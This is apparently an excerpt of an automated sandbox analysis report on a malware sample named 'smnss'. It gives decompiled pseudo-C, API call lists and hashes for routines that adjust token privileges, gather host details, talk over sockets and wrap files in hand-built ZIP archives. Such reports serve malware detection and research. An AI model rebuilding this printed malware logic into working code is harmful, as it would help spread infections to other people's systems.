                                                                          				intOrPtr _t38;
                                                                          				intOrPtr _t39;
                                                                          				void* _t42;
                                                                          				signed int _t44;
                                                                          
                                                                          				_v44 = E00401000; // executed
                                                                          				SetUnhandledExceptionFilter(_t34); // executed
                                                                          				_t44 = _t42 - 0x20;
                                                                          				E0040B000(E0040AF00(_t36, _t37));
                                                                          				_v12 = 0;
                                                                          				_v32 =  &_v12;
                                                                          				_t20 =  *0x40d4e4; // 0xffffffff
                                                                          				 *_t44 = 0x414004;
                                                                          				_v36 = _t20;
                                                                          				_v40 =  &_v16;
                                                                          				_v44 = 0x414000;
                                                                          				L0040C1B0();
                                                                          				_t23 =  *0x418230;
                                                                          				if(_t23 == 0) {
                                                                          					L7:
                                                                          					L0040C1A0();
                                                                          					_t38 =  *0x40d4e8; // 0x4000
                                                                          					 *_t23 = _t38;
                                                                          					E0040AED0(_t23);
                                                                          					_t44 = _t44 & 0xfffffff0; // executed
                                                                          					_t25 = E0040AEB0(); // executed
                                                                          					L0040C190();
                                                                          					_v40 =  *_t25;
                                                                          					_v44 =  *0x414000;
                                                                          					 *_t44 =  *0x414004; // executed
                                                                          					_t23 = E00404076(_t38); // executed
                                                                          					L0040C188();
                                                                          					 *_t44 = _t23;
                                                                          					ExitProcess(??);
                                                                          					goto L8;
                                                                          				} else {
                                                                          					 *0x40d4e8 = _t23;
                                                                          					_t39 =  *0x4194a4;
                                                                          					if(_t39 != 0) {
                                                                          						L8:
                                                                          						_v40 = _t23;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          						_t39 =  *0x4194a4;
                                                                          					}
                                                                          					if(_t39 != 0xffffffe0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          						_t39 =  *0x4194a4;
                                                                          					}
                                                                          					if(_t39 != 0xffffffc0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          					}
                                                                          					goto L7;
                                                                          				}
                                                                          			}



















                                                                          0x00401157
                                                                          0x0040115e
                                                                          0x00401163
                                                                          0x0040116b
                                                                          0x00401170
                                                                          0x0040117a
                                                                          0x0040117e
                                                                          0x00401183
                                                                          0x0040118a
                                                                          0x00401191
                                                                          0x0040119a
                                                                          0x0040119e
                                                                          0x004011a3
                                                                          0x004011aa
                                                                          0x00401210
                                                                          0x00401210
                                                                          0x00401215
                                                                          0x0040121b
                                                                          0x0040121d
                                                                          0x00401222
                                                                          0x00401225
                                                                          0x0040122a
                                                                          0x00401231
                                                                          0x0040123a
                                                                          0x00401243
                                                                          0x00401246
                                                                          0x0040124d
                                                                          0x00401252
                                                                          0x00401255
                                                                          0x00000000
                                                                          0x004011ac
                                                                          0x004011ac
                                                                          0x004011b1
                                                                          0x004011b9
                                                                          0x00401260
                                                                          0x00401260
                                                                          0x00401269
                                                                          0x0040126c
                                                                          0x0040126f
                                                                          0x00401274
                                                                          0x00401274
                                                                          0x004011c2
                                                                          0x004011c9
                                                                          0x004011d2
                                                                          0x004011d5
                                                                          0x004011d8
                                                                          0x004011dd
                                                                          0x004011dd
                                                                          0x004011e6
                                                                          0x004011ed
                                                                          0x004011f6
                                                                          0x004011f9
                                                                          0x004011fc
                                                                          0x004011fc
                                                                          0x00000000
                                                                          0x004011e6

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                          • String ID:
                                                                          • API String ID: 3695137517-0
                                                                          • Opcode ID: 17c38317f9a66652df7258aecbb9e80ccef0f3f3888fbe713f9de6f1fcdca26b
                                                                          • Instruction ID: fdd625d713225136926791f8e063cfc049a139930cefd6fb9cd0f0f3deb6f4ef
                                                                          • Opcode Fuzzy Hash: 17c38317f9a66652df7258aecbb9e80ccef0f3f3888fbe713f9de6f1fcdca26b
                                                                          • Instruction Fuzzy Hash: 8F310DB4908701DFC700EF75D98164E77E5BF88354F008A7EE545AB3A2D738A8418F5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 64%
                                                                          			E00401150() {
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char* _v32;
                                                                          				intOrPtr _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				intOrPtr _t20;
                                                                          				char _t23;
                                                                          				intOrPtr* _t25;
                                                                          				void* _t35;
                                                                          				void* _t36;
                                                                          				intOrPtr _t37;
                                                                          				intOrPtr _t38;
                                                                          				void* _t39;
                                                                          				signed int _t40;
                                                                          
                                                                          				_v44 = E00401000; // executed
                                                                          				SetUnhandledExceptionFilter(??); // executed
                                                                          				_t40 = _t39 - 4;
                                                                          				E0040B000(E0040AF00(_t35, _t36));
                                                                          				_v12 = 0;
                                                                          				_v32 =  &_v12;
                                                                          				_t20 =  *0x40d4e4; // 0xffffffff
                                                                          				 *_t40 = 0x414004;
                                                                          				_v36 = _t20;
                                                                          				_v40 =  &_v16;
                                                                          				_v44 = 0x414000;
                                                                          				L0040C1B0();
                                                                          				_t23 =  *0x418230;
                                                                          				if(_t23 == 0) {
                                                                          					L6:
                                                                          					L0040C1A0();
                                                                          					_t37 =  *0x40d4e8; // 0x4000
                                                                          					 *_t23 = _t37;
                                                                          					E0040AED0(_t23);
                                                                          					_t40 = _t40 & 0xfffffff0; // executed
                                                                          					_t25 = E0040AEB0(); // executed
                                                                          					L0040C190();
                                                                          					_v40 =  *_t25;
                                                                          					_v44 =  *0x414000;
                                                                          					 *_t40 =  *0x414004; // executed
                                                                          					_t23 = E00404076(_t37); // executed
                                                                          					L0040C188();
                                                                          					 *_t40 = _t23;
                                                                          					ExitProcess(??);
                                                                          					L7:
                                                                          					_v40 = _t23;
                                                                          					_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
                                                                          					_v44 = _t23;
                                                                          					L0040C1A8();
                                                                          					_t38 =  *0x4194a4;
                                                                          					L2:
                                                                          					if(_t38 != 0xffffffe0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          						_t38 =  *0x4194a4;
                                                                          					}
                                                                          					if(_t38 != 0xffffffc0) {
                                                                          						_v40 =  *0x418230;
                                                                          						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
                                                                          						_v44 = _t23;
                                                                          						L0040C1A8();
                                                                          					}
                                                                          					goto L6;
                                                                          				}
                                                                          				 *0x40d4e8 = _t23;
                                                                          				_t38 =  *0x4194a4;
                                                                          				if(_t38 != 0) {
                                                                          					goto L7;
                                                                          				}
                                                                          				goto L2;
                                                                          			}


















                                                                          0x00401157
                                                                          0x0040115e
                                                                          0x00401163
                                                                          0x0040116b
                                                                          0x00401170
                                                                          0x0040117a
                                                                          0x0040117e
                                                                          0x00401183
                                                                          0x0040118a
                                                                          0x00401191
                                                                          0x0040119a
                                                                          0x0040119e
                                                                          0x004011a3
                                                                          0x004011aa
                                                                          0x00401210
                                                                          0x00401210
                                                                          0x00401215
                                                                          0x0040121b
                                                                          0x0040121d
                                                                          0x00401222
                                                                          0x00401225
                                                                          0x0040122a
                                                                          0x00401231
                                                                          0x0040123a
                                                                          0x00401243
                                                                          0x00401246
                                                                          0x0040124d
                                                                          0x00401252
                                                                          0x00401255
                                                                          0x00401260
                                                                          0x00401260
                                                                          0x00401269
                                                                          0x0040126c
                                                                          0x0040126f
                                                                          0x00401274
                                                                          0x004011bf
                                                                          0x004011c2
                                                                          0x004011c9
                                                                          0x004011d2
                                                                          0x004011d5
                                                                          0x004011d8
                                                                          0x004011dd
                                                                          0x004011dd
                                                                          0x004011e6
                                                                          0x004011ed
                                                                          0x004011f6
                                                                          0x004011f9
                                                                          0x004011fc
                                                                          0x004011fc
                                                                          0x00000000
                                                                          0x004011e6
                                                                          0x004011ac
                                                                          0x004011b1
                                                                          0x004011b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                          • String ID:
                                                                          • API String ID: 3695137517-0
                                                                          • Opcode ID: 5dea925255efc0a92b5cd23e23833b04243e3d0205a30240cc68abcc00f57cf9
                                                                          • Instruction ID: fe54e7aefeed6918a5ef1b916f0e819b51a912cea38922c35654569b06e5a2dd
                                                                          • Opcode Fuzzy Hash: 5dea925255efc0a92b5cd23e23833b04243e3d0205a30240cc68abcc00f57cf9
                                                                          • Instruction Fuzzy Hash: 8631EDB4908701DFC700EF75D98154E77E5BF88354F008A7EE545AB3A2D73898418B5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 324 404df4-404e1b GetCurrentProcess OpenProcessToken 325 404e21-404e40 LookupPrivilegeValueA 324->325 326 404ea6 324->326 328 404e42-404e96 AdjustTokenPrivileges 325->328 329 404e98-404ea3 CloseHandle 325->329 327 404eab-404eac 326->327 328->327 329->326
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 00404DFA
                                                                          • OpenProcessToken.ADVAPI32 ref: 00404E11
                                                                          • LookupPrivilegeValueA.ADVAPI32 ref: 00404E36
                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00404E89
                                                                          • CloseHandle.KERNEL32 ref: 00404E9E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                          • String ID: (
                                                                          • API String ID: 3038321057-3887548279
                                                                          • Opcode ID: 70bff709f9072d4e6a1122d309d6733e6ebeebff8d79adb6f2d5725a62973f5d
                                                                          • Instruction ID: 79319732bb30defa6c9a9f1a6b789a97df9146ac2c859e5e9c71adcb6af8603d
                                                                          • Opcode Fuzzy Hash: 70bff709f9072d4e6a1122d309d6733e6ebeebff8d79adb6f2d5725a62973f5d
                                                                          • Instruction Fuzzy Hash: 21119BB4904305DBDB00EF69C18579EBBF4BF44348F00892EE884A7385E779D549CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • memset.MSVCRT ref: 00401C63
                                                                          • memset.MSVCRT ref: 00401C81
                                                                          • _mbscat.MSVCRT ref: 00401C90
                                                                          • _mbscat.MSVCRT ref: 00401CCD
                                                                            • Part of subcall function 00405316: gethostname.WS2_32 ref: 0040532B
                                                                            • Part of subcall function 00405316: gethostbyname.WS2_32 ref: 00405336
                                                                            • Part of subcall function 00405316: inet_ntoa.WS2_32 ref: 00405351
                                                                          • _mbscat.MSVCRT ref: 00401D1B
                                                                            • Part of subcall function 00405256: GetVersionExA.KERNEL32 ref: 00405272
                                                                          • _mbscat.MSVCRT ref: 00401D49
                                                                          • _mbscat.MSVCRT ref: 00401D7D
                                                                          • Sleep.KERNEL32 ref: 00401E82
                                                                          • _mbscat.MSVCRT ref: 00401DD7
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          • send.WS2_32 ref: 00401EF2
                                                                          • recv.WS2_32 ref: 00401F2A
                                                                          • strtok.MSVCRT ref: 00401F89
                                                                          • strtok.MSVCRT ref: 00401FA8
                                                                          • closesocket.WS2_32 ref: 00401FBD
                                                                          • atoi.MSVCRT ref: 00401FD4
                                                                          • atoi.MSVCRT ref: 00401FEA
                                                                          • memset.MSVCRT ref: 00402043
                                                                          • lstrlen.KERNEL32 ref: 00402051
                                                                            • Part of subcall function 0040447C: CryptAcquireContextA.ADVAPI32 ref: 004044BD
                                                                            • Part of subcall function 0040447C: CryptCreateHash.ADVAPI32 ref: 004044F7
                                                                            • Part of subcall function 0040447C: CryptHashData.ADVAPI32 ref: 00404528
                                                                            • Part of subcall function 0040447C: CryptDestroyHash.ADVAPI32 ref: 0040453A
                                                                            • Part of subcall function 0040447C: CryptReleaseContext.ADVAPI32 ref: 00404550
                                                                          • lstrcmp.KERNEL32 ref: 004020AB
                                                                          • lstrcmp.KERNEL32 ref: 004020CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: _mbscat$Crypt$Hashmemset$Contextatoilstrcmpstrtok$AcquireConnectedCreateDataDestroyHandleInternetLibraryLoadModuleReleaseSleepStateVersionclosesocketgethostbynamegethostnameinet_ntoalstrlenrecvsend
                                                                          • String ID: -Age$3159$=-A$P$expl$nt: $ost:$wer
                                                                          • API String ID: 1488133686-2239103369
                                                                          • Opcode ID: de7e634d1739514db72c789e03cdfd8988fa8f181946e4b526a8adfd228abd02
                                                                          • Instruction ID: 99ea3051cc31653010b65aed47ab6d4c6dbc815114f0d374468db723e332898a
                                                                          • Opcode Fuzzy Hash: de7e634d1739514db72c789e03cdfd8988fa8f181946e4b526a8adfd228abd02
                                                                          • Instruction Fuzzy Hash: 79C186B48043148BD724AF29C58535A7BF1EF85318F2086AEE45C5B7D2CB798D86CF46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 86%
                                                                          			E0040829C(signed int __edx, CHAR* _a4, CHAR* _a8, void* _a12) {
                                                                          				void* _v16;
                                                                          				short _v32;
                                                                          				short _v34;
                                                                          				long _v38;
                                                                          				long _v42;
                                                                          				intOrPtr _v46;
                                                                          				void* _v48;
                                                                          				signed short _v50;
                                                                          				short _v52;
                                                                          				short _v54;
                                                                          				short _v56;
                                                                          				void _v60;
                                                                          				short _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				short _v82;
                                                                          				short _v84;
                                                                          				short _v86;
                                                                          				short _v88;
                                                                          				char _v92;
                                                                          				struct _OVERLAPPED* _v98;
                                                                          				intOrPtr _v102;
                                                                          				short _v104;
                                                                          				short _v110;
                                                                          				short _v112;
                                                                          				long _v116;
                                                                          				long _v120;
                                                                          				intOrPtr _v124;
                                                                          				short _v126;
                                                                          				short _v128;
                                                                          				short _v130;
                                                                          				short _v132;
                                                                          				short _v134;
                                                                          				short _v136;
                                                                          				void _v140;
                                                                          				char _v1164;
                                                                          				long _v1168;
                                                                          				long _v1172;
                                                                          				void* _v1176;
                                                                          				void* _v1188;
                                                                          				void* _v1192;
                                                                          				void* _v1196;
                                                                          				void* _v1200;
                                                                          				void* _v1204;
                                                                          				void* _v1208;
                                                                          				char _v1212;
                                                                          				struct _OVERLAPPED* _v1216;
                                                                          				void* _v1220;
                                                                          				long _v1224;
                                                                          				void* _v1228;
                                                                          				signed int _t133;
                                                                          				signed int _t137;
                                                                          				int _t140;
                                                                          				int _t141;
                                                                          				intOrPtr _t148;
                                                                          				long _t149;
                                                                          				long _t150;
                                                                          				short _t151;
                                                                          				long _t155;
                                                                          				char _t159;
                                                                          				int _t162;
                                                                          				long _t167;
                                                                          				void* _t171;
                                                                          				intOrPtr _t187;
                                                                          				struct _OVERLAPPED* _t190;
                                                                          				signed int _t197;
                                                                          				signed int _t199;
                                                                          				void* _t204;
                                                                          				void* _t206;
                                                                          				void* _t208;
                                                                          				void* _t210;
                                                                          				void* _t211;
                                                                          				void* _t212;
                                                                          				void* _t213;
                                                                          				void* _t214;
                                                                          				void* _t225;
                                                                          				void* _t226;
                                                                          				intOrPtr* _t230;
                                                                          				void** _t231;
                                                                          
                                                                          				_t197 = __edx;
                                                                          				_t133 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
                                                                          				_t213 = _t212 - 0x1c;
                                                                          				_t211 = _t133;
                                                                          				_t190 = 0;
                                                                          				_t199 = _t197 & 0xffffff00 | _t133 == 0xffffffff | _t133 & 0xffffff00 | _t133 == 0x00000000;
                                                                          				if(_t199 == 0) {
                                                                          					_t137 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0); // executed
                                                                          					_t214 = _t213 - 0x1c;
                                                                          					_v1176 = _t137;
                                                                          					if((_t199 & 0xffffff00 | _t137 == 0xffffffff | _t137 & 0xffffff00 | _t137 == 0x00000000) == 0) {
                                                                          						_t204 =  &_v60;
                                                                          						asm("cld");
                                                                          						_t140 = memset(_t204, 0, 7 << 2);
                                                                          						 *((short*)(_t204 + 7)) = 0;
                                                                          						_t206 =  &_v140;
                                                                          						_t141 = memset(_t206, _t140, 0xb << 2);
                                                                          						 *((short*)(_t206 + 0xb)) = 0;
                                                                          						_t208 =  &_v92;
                                                                          						memset(_t208, _t141, 5 << 2);
                                                                          						 *((short*)(_t208 + 5)) = 0;
                                                                          						_v60 = 0x4034b50;
                                                                          						_v56 = 0xa;
                                                                          						_v134 = 0xa;
                                                                          						_v54 = 0;
                                                                          						_v132 = 0;
                                                                          						_v52 = 0;
                                                                          						_v130 = 0;
                                                                          						E0040814C( &_v50,  &_v48);
                                                                          						_v128 = _v50 & 0x0000ffff;
                                                                          						_v126 = _v48;
                                                                          						_t148 = E004081D8(_t211); // executed
                                                                          						_v46 = _t148;
                                                                          						_v124 = _t148;
                                                                          						_t149 = GetFileSize(_t211, 0);
                                                                          						_v42 = _t149;
                                                                          						_v120 = _t149;
                                                                          						_t150 = GetFileSize(_t211, 0);
                                                                          						_v38 = _t150;
                                                                          						_v116 = _t150;
                                                                          						_t151 = _a12;
                                                                          						_v1212 = _t151;
                                                                          						L0040C310();
                                                                          						_v34 = _t151;
                                                                          						_v112 = _t151;
                                                                          						_v32 = 0;
                                                                          						_v110 = 0;
                                                                          						_v98 = 0;
                                                                          						WriteFile(_v1176,  &_v60, 0x1e,  &_v1168, 0); // executed
                                                                          						_t155 = _a12;
                                                                          						_v1216 = _t155;
                                                                          						L0040C310();
                                                                          						WriteFile(_v1176, _a12, _t155,  &_v1168, 0); // executed
                                                                          						_t159 = _a12;
                                                                          						_v1220 = _t159;
                                                                          						L0040C310();
                                                                          						_t74 = _t159 + 0x1e; // 0x1e
                                                                          						_t187 = _t74;
                                                                          						SetFilePointer(_t211, 0, 0, 0); // executed
                                                                          						_t225 = _t214 + 0x24 - 0xffffffffffffffbc;
                                                                          						_t210 =  &_v1164;
                                                                          						while(1) {
                                                                          							_v1168 = 0;
                                                                          							_t162 = ReadFile(_t211, _t210, 0x400,  &_v1168, 0); // executed
                                                                          							_t226 = _t225 - 0x14;
                                                                          							if(_t162 == 0 || _v1168 == 0) {
                                                                          								break;
                                                                          							}
                                                                          							WriteFile(_v1176, _t210, _v1168,  &_v1172, 0); // executed
                                                                          							_t225 = _t226 - 0x14;
                                                                          							_t187 = _t187 + _v1168;
                                                                          						}
                                                                          						_v76 = _t187;
                                                                          						_v140 = 0x2014b50;
                                                                          						_v136 = 0x14;
                                                                          						_v104 = 0;
                                                                          						_v102 = 0x20;
                                                                          						WriteFile(_v1176,  &_v140, 0x2e,  &_v1168, 0); // executed
                                                                          						_t167 = _a12;
                                                                          						_v1224 = _t167;
                                                                          						L0040C310();
                                                                          						WriteFile(_v1176, _a12, _t167,  &_v1168, 0); // executed
                                                                          						_t171 = _a12;
                                                                          						_v1228 = _t171;
                                                                          						L0040C310();
                                                                          						_t230 = _t226 - 0xfffffffffffffff8;
                                                                          						_v92 = 0x6054b50;
                                                                          						_v88 = 0;
                                                                          						_v86 = 0;
                                                                          						_v84 = 1;
                                                                          						_v82 = 1;
                                                                          						_v80 = _t187 + 0x2e + _t171 - _v76;
                                                                          						_v72 = 0;
                                                                          						_v1216 = 0;
                                                                          						_v1220 =  &_v1168;
                                                                          						_v1224 = 0x16;
                                                                          						_v1228 =  &_v92;
                                                                          						 *_t230 = _v1176; // executed
                                                                          						WriteFile(??, ??, ??, ??, ??); // executed
                                                                          						_t231 = _t230 - 0x14;
                                                                          						 *_t231 = _v1176; // executed
                                                                          						CloseHandle(??); // executed
                                                                          						 *(_t231 - 4) = _t211;
                                                                          						CloseHandle(??);
                                                                          						_t190 = 1;
                                                                          					} else {
                                                                          						CloseHandle(_t211);
                                                                          						_t190 = 0;
                                                                          					}
                                                                          				}
                                                                          				return _t190;
                                                                          			}


















































































                                                                          0x0040829c
                                                                          0x004082de
                                                                          0x004082e3
                                                                          0x004082e6
                                                                          0x004082f3
                                                                          0x004082f8
                                                                          0x004082fa
                                                                          0x00408336
                                                                          0x0040833b
                                                                          0x0040833e
                                                                          0x00408351
                                                                          0x00408368
                                                                          0x0040836b
                                                                          0x00408376
                                                                          0x00408378
                                                                          0x0040837d
                                                                          0x00408388
                                                                          0x0040838a
                                                                          0x0040838f
                                                                          0x00408397
                                                                          0x00408399
                                                                          0x0040839e
                                                                          0x004083a5
                                                                          0x004083ab
                                                                          0x004083b4
                                                                          0x004083ba
                                                                          0x004083c0
                                                                          0x004083c6
                                                                          0x004083dc
                                                                          0x004083e5
                                                                          0x004083ec
                                                                          0x004083f3
                                                                          0x004083f8
                                                                          0x004083fb
                                                                          0x00408409
                                                                          0x00408411
                                                                          0x00408414
                                                                          0x00408422
                                                                          0x0040842a
                                                                          0x0040842d
                                                                          0x00408430
                                                                          0x00408433
                                                                          0x00408436
                                                                          0x0040843e
                                                                          0x00408442
                                                                          0x00408446
                                                                          0x0040844c
                                                                          0x00408452
                                                                          0x00408480
                                                                          0x00408488
                                                                          0x0040848b
                                                                          0x0040848e
                                                                          0x004084bc
                                                                          0x004084c4
                                                                          0x004084c7
                                                                          0x004084ca
                                                                          0x004084d2
                                                                          0x004084d2
                                                                          0x004084f0
                                                                          0x004084f5
                                                                          0x004084f8
                                                                          0x004084fe
                                                                          0x004084fe
                                                                          0x00408529
                                                                          0x0040852e
                                                                          0x00408533
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408567
                                                                          0x0040856c
                                                                          0x0040856f
                                                                          0x0040856f
                                                                          0x00408577
                                                                          0x0040857a
                                                                          0x00408584
                                                                          0x0040858d
                                                                          0x00408593
                                                                          0x004085c7
                                                                          0x004085d2
                                                                          0x004085d5
                                                                          0x004085d8
                                                                          0x00408606
                                                                          0x0040860e
                                                                          0x00408611
                                                                          0x00408614
                                                                          0x00408619
                                                                          0x0040861e
                                                                          0x00408625
                                                                          0x0040862b
                                                                          0x00408631
                                                                          0x00408637
                                                                          0x00408642
                                                                          0x00408645
                                                                          0x0040864b
                                                                          0x00408659
                                                                          0x0040865d
                                                                          0x00408668
                                                                          0x00408672
                                                                          0x00408675
                                                                          0x0040867a
                                                                          0x00408683
                                                                          0x00408686
                                                                          0x0040868e
                                                                          0x00408691
                                                                          0x00408699
                                                                          0x00408353
                                                                          0x00408356
                                                                          0x0040835e
                                                                          0x0040835e
                                                                          0x00408351
                                                                          0x004086a7

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
